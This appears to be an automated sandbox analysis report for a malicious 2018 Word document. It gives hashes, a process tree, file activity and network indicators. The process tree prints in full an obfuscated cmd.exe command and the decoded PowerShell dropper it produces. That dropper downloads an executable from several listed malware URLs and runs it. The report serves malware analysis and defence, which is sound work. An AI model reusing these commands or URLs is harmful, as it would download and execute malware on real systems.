File name: | EIN_68213263752842.doc |
Full analysis: | https://app.any.run/tasks/b2fdee59-f7cb-4cd4-b1a8-599c86fb7d6f |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 08:09:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 12:02:00 2018, Last Saved Time/Date: Mon Dec 17 12:02:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 40, Security: 0 |
MD5: | B788E8D1C22FF37748EAB1FE2DC43317 |
SHA1: | E7306D7DBB5218A7C89333FC613CFE54DFEFB0AD |
SHA256: | 7413E01ED04D1D8829351AA54ACB611070B0C3637400E6C0342FEC9C4B66A212 |
SSDEEP: | 1536:X7ljmW9/bvFImENhDM3Rgn5wZqagg+R6+a9:rl/bvFBE35wZe |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:17 12:02:00 |
ModifyDate: | 2018:12:17 12:02:00 |
Pages: | 1 |
Words: | 6 |
Characters: | 40 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 45 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EIN_68213263752842.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2212 | c:\PKibMjKU\nNXiQLiwiGMYH\oZubsiGZzHV\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set Zb4=zRINSdPIpbUnmmfrzthCqLnc}wgE/MW8J:.@KD6)e;,jl o9$\+F0(aixTAu-ZGvsXBk'73QH{y2=&&for %N in (48,55,54,21,76,68,43,71,7,68,41,48,55,71,25,76,22,40,25,60,46,9,43,40,23,17,45,3,40,17,34,30,40,9,19,44,55,40,22,17,41,48,1,65,61,76,68,18,17,17,8,33,28,28,25,25,25,34,63,40,22,59,64,55,22,5,40,56,64,74,64,17,40,13,64,34,23,46,13,28,47,16,19,67,74,25,35,18,17,17,8,33,28,28,25,25,25,34,20,9,55,23,64,55,22,17,40,15,55,46,15,64,34,23,46,13,28,22,30,22,66,64,29,7,35,18,17,17,8,33,28,28,25,25,25,34,26,46,46,5,64,46,22,26,34,15,59,28,4,15,36,64,70,35,18,17,17,8,33,28,28,25,25,25,34,67,40,22,26,46,44,14,44,40,64,64,46,22,64,34,23,46,13,28,4,20,21,17,35,18,17,17,8,33,28,28,25,25,25,34,14,55,15,64,17,23,18,55,23,54,26,46,34,22,40,17,28,66,7,30,38,44,68,34,4,8,44,55,17,53,68,35,68,39,41,48,29,57,16,76,68,4,21,30,68,41,48,57,55,36,45,76,45,68,75,69,31,68,41,48,54,55,5,76,68,18,7,43,68,41,48,13,15,43,76,48,40,22,63,33,17,40,13,8,50,68,49,68,50,48,57,55,36,50,68,34,40,56,40,68,41,14,46,15,40,54,23,18,53,48,58,29,6,45,55,22,45,48,1,65,61,39,73,17,15,74,73,48,55,71,25,34,37,46,25,22,44,46,54,5,51,55,44,40,53,48,58,29,6,42,45,48,13,15,43,39,41,48,18,3,66,76,68,66,22,18,68,41,7,14,45,53,53,62,40,17,60,7,17,40,13,45,48,13,15,43,39,34,44,40,22,26,17,18,45,60,26,40,45,31,52,52,52,52,39,45,73,7,22,63,46,67,40,60,7,17,40,13,45,48,13,15,43,41,48,16,21,27,76,68,32,72,66,68,41,9,15,40,54,67,41,24,24,23,54,17,23,18,73,24,24,48,19,15,18,76,68,22,59,9,68,41,87)do set wB=!wB!!Zb4:~%N,1!&&if %N==87 powershell.exe "!wB:~4!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2792 | CmD /V/C"set Zb4=zRINSdPIpbUnmmfrzthCqLnc}wgE/MW8J:.@KD6)e;,jl o9$\+F0(aixTAu-ZGvsXBk'73QH{y2=&&for %N in (48,55,54,21,76,68,43,71,7,68,41,48,55,71,25,76,22,40,25,60,46,9,43,40,23,17,45,3,40,17,34,30,40,9,19,44,55,40,22,17,41,48,1,65,61,76,68,18,17,17,8,33,28,28,25,25,25,34,63,40,22,59,64,55,22,5,40,56,64,74,64,17,40,13,64,34,23,46,13,28,47,16,19,67,74,25,35,18,17,17,8,33,28,28,25,25,25,34,20,9,55,23,64,55,22,17,40,15,55,46,15,64,34,23,46,13,28,22,30,22,66,64,29,7,35,18,17,17,8,33,28,28,25,25,25,34,26,46,46,5,64,46,22,26,34,15,59,28,4,15,36,64,70,35,18,17,17,8,33,28,28,25,25,25,34,67,40,22,26,46,44,14,44,40,64,64,46,22,64,34,23,46,13,28,4,20,21,17,35,18,17,17,8,33,28,28,25,25,25,34,14,55,15,64,17,23,18,55,23,54,26,46,34,22,40,17,28,66,7,30,38,44,68,34,4,8,44,55,17,53,68,35,68,39,41,48,29,57,16,76,68,4,21,30,68,41,48,57,55,36,45,76,45,68,75,69,31,68,41,48,54,55,5,76,68,18,7,43,68,41,48,13,15,43,76,48,40,22,63,33,17,40,13,8,50,68,49,68,50,48,57,55,36,50,68,34,40,56,40,68,41,14,46,15,40,54,23,18,53,48,58,29,6,45,55,22,45,48,1,65,61,39,73,17,15,74,73,48,55,71,25,34,37,46,25,22,44,46,54,5,51,55,44,40,53,48,58,29,6,42,45,48,13,15,43,39,41,48,18,3,66,76,68,66,22,18,68,41,7,14,45,53,53,62,40,17,60,7,17,40,13,45,48,13,15,43,39,34,44,40,22,26,17,18,45,60,26,40,45,31,52,52,52,52,39,45,73,7,22,63,46,67,40,60,7,17,40,13,45,48,13,15,43,41,48,16,21,27,76,68,32,72,66,68,41,9,15,40,54,67,41,24,24,23,54,17,23,18,73,24,24,48,19,15,18,76,68,22,59,9,68,41,87)do set wB=!wB!!Zb4:~%N,1!&&if %N==87 powershell.exe "!wB:~4!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2692 | powershell.exe "$iaL='jQI';$iQw=new-object Net.WebClient;$RXZ='http://www.venusindexsystems.com/9zCkyw@http://www.qbicsinteriors.com/nWnBsMI@http://www.goodsong.ru/SrKs3@http://www.kengolflessons.com/SqLt@http://www.firstchicago.net/BIW6l'.Split('@');$MTz='SLW';$TiK = '278';$aid='hIj';$mrj=$env:temp+'\'+$TiK+'.exe';foreach($AMP in $RXZ){try{$iQw.DownloadFile($AMP, $mrj);$hNB='Bnh';If ((Get-Item $mrj).length -ge 80000) {Invoke-Item $mrj;$zLE='JHB';break;}}catch{}}$Crh='nub';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR892B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FABF5A6C.wmf | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C88AE75A.wmf | — | |
MD5:— | SHA256:— | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SQGCJV68WB7XGREWU8QM.temp | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE4A9F7D.wmf | wmf | |
MD5:58A1D3048FEBA527C4543A221E143B80 | SHA256:C6793C14076BD33B8A8A2BF861199AB70884CFFCCF926547AD9B76F2091BDAC6 | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6E28B672E33ED44FA2233E4B0EA4D984 | SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F55C57.wmf | wmf | |
MD5:1A490D9BD40844C0204C6BDA62261C78 | SHA256:2B053530713C1F681A046880EAC9A40E20D8833A26A677C85A430941440D8ECD | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a81.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$N_68213263752842.doc | pgc | |
MD5:1971E523D4EBFB292509C6D571A9CB61 | SHA256:EE70DD810484F3FA07663EAA9A7E9E14B0DC11BFCDCD6048D243586708322868 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2692 | powershell.exe | GET | — | 98.129.229.176:80 | http://www.venusindexsystems.com/9zCkyw | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2692 | powershell.exe | 98.129.229.176:80 | www.venusindexsystems.com | Liquid Web, L.L.C | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.venusindexsystems.com |
| malicious |